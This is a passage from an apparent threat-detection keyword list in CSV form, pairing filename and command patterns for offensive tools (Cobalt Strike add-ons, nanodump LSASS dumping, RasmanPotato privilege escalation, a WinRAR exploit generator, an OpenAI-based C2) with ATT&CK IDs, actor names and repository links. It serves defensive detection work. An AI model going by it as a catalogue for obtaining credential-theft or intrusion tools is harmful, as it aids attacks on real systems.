T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*RainbowCrack*,offensive_tool_keyword,RainbowCrack,The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one. which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called rainbow tables. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. For downloads and more information. visit the RainbowCrack homepage,T1110 - T1208 - T1212 - T1609,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,http://project-rainbowcrack.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rai-redirector-dns*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*rai-redirector-http*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*raiseChild.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rajkumardusad/onex*,offensive_tool_keyword,onex,Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/rajkumardusad/onex,1,1,N/A,N/A,,N/A,,, -*rajkumardusad/Tool-X*,offensive_tool_keyword,Tool-X,Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.,T1212 - T1566 - T1550 - T1133,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/rajkumardusad/Tool-X,1,1,N/A,N/A,,N/A,,, -*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*random_c2_profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*random_c2profile.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*random_user_agent.params*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*random_user_agent.user_agent*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*randomalice1986@*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,1,email user name,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -*-RandomAttackPath -Token*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,0,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*randombob1986@*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,1,email user name,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -*randomize_sw2_seed.py*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*Ransom.Win32.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword for ransomware,T1486 - T1489 - T1490 - T1485 - T1487 - T1491 - T1492 - T1488 - T1493 - T1497,TA0007 - TA0003 - TA0002 - TA0004 - TA0006 - TA0010,N/A,N/A,Ransomware,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver/indicators-blackcat-ransomware-deploys-new-signed-kernel-driver.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Ransom:Win32*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,ransom signatures,10,10,N/A,N/A,N/A,N/A -*Ransom:Win32*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Ransom:Win64*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Ransom_Petya*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Ransomware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Ransom_WCRY*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Ransomware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Ransomware POC tool that encrypts a given directory*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*Ransomware.dll*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*Ransomware.pdb*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*ransomware_config.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*ransomware_payload.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*Ransomware-E20F7CED-42AD-485E-BE4D-DE21DCE58EC0.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*RansomwarePoc.cpp*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*RansomwarePoc.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*RansomwarePoc\RansomwarePoc*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*Rapid7*,offensive_tool_keyword,rapid7,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://www.rapid7.com/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rapid7.github.io/metasploit-framework/api/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Rar a -v3g -k -r -s -m3 *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rar2john *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*rar2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*rarce *.pdf *.rar*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*rarce *.rar*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*rarce-1.0.0.tar.gz*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,1,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*rarce-1.0.0-py3-none-any.whl*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,1,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*rasman*whoami*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*RasMan.cpp*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*RasMan.sln*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*RasMan.vcxproj*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*rasman_c.c*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*rasman_h.h*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*RasmanPotato-master*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*rasta-mouse*,offensive_tool_keyword,Github Username,github user author of various offensive tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/rasta-mouse,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rasta-mouse/PPEnum*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*rasta-mouse/RuralBishop*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*rasta-mouse/SharpC2*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*rasta-mouse/ThreatCheck*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*rasta-mouse/TikiTorch*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*ratchatPT*/bin/bash*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*RatChatPT.exe*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*RatChatPT.exe*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*RatChatPT_windows.exe*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*RatChatPT_windows.exe*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*ratchatpt-main*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*ratchatpt-main*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z 